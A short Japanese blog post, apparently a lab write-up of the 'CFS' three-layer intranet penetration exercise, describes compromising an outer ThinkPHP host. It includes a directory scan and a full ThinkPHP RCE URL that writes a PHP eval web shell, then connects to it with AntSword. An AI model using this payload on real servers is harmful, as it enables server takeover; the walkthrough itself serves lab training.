技術共有

CFS 3 層イントラネット侵入 - 外部ネットワーク管理 (1)

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

目次

外部ネットワーク管理

まずは爆破して攻撃方法があるか確認しましょう。

怪しいパスを試してみたらthinkphpのフレームワークだったのでバージョンもわかったので翌日戦いましょう。

phpに書き込む

編集してphpに正常に書き込み、翌日にはそれを取得するだけです編集

蟻剣rceトライリンク

正常に管理されました


外部ネットワーク管理

まずは爆破して攻撃方法があるか確認しましょう。

dirsearch、dirb、gobuster などのツールを試すことができます

dirb http://192.168.20.130/

怪しいパスを試してみたらthinkphpのフレームワークだったのでバージョンもわかったので翌日戦いましょう。

phpに書き込む

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

php に正常に書き込まれたので、簡単に取得できます。

http://192.168.20.130/public/shell.php

蟻剣rceトライリンク

正常に管理されました